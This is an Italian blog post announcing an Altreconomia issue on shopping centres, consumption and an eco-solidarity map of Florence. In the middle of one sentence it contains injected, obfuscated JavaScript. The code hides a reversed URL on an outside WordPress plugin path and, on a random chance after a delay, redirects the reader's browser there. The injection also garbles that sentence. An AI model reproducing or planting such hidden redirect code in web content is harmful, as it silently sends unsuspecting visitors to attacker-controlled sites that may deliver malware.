Oltre la città-vetrina, arriva la mappa di Firenze citta eco-solidale

image_pdfimage_print

La copertina di Altreconomia dedicata ai consumi
oppure abbon (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andovi, che costa pochissimo). Un numero tutto dedicato ai consumi: in tutto il Paese ci sono 795 centri commerciali più grandi di 5mila metri quadrati, ma nei prossimi anni nasceranno iper per altri 5 milioni di metri quadrati. All’interno, un’inchiesta e numerosi servizi fanno il punto sul confronto tra “vecchi centri commerciali e nuovi stili di consumo”.

Ben quattro pagine sono dedicate alla mappa di Firenze, citta eco-solidale fuori dallo stereotipo della “città-vetrina” propinato dai tour operator. Le ha curate la nostra “direttora” Cecilia Stefani.

L’inchiesta, “Il super punta a Sud”, guarda al meridione d’Italia invaso da chi costruisce e gestisce centri commerciali. Anche nel 2008, in tutta Italia sono stati inaugurati 29 centri commerciali; 9 nelle Regioni meridionali. La Sicilia è in pole position per nuovi progetti (ce ne sono una dozzina in costruzione, da Catania a Palermo, da Enna a Caltanisetta), perché sull’isola la superficie commerciale occupata dalla grande distribuzione è, in media, di 88 metri quadri per abitante, contro una media nazionale di 220. Il problema è che in molte Regioni manca ancora una legislazione adeguata: nel Lazio, ad esempio, il piano per l’insediamento di attività commerciali della gdo è scaduto nel 2005, e da allora lo sviluppo dei centri commerciali è avvenuto in deroga agli indici regionali, ai piani regolatori e ai pian i del commercio.

L’indice completo del numero 106 di Altreconomia è qui.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *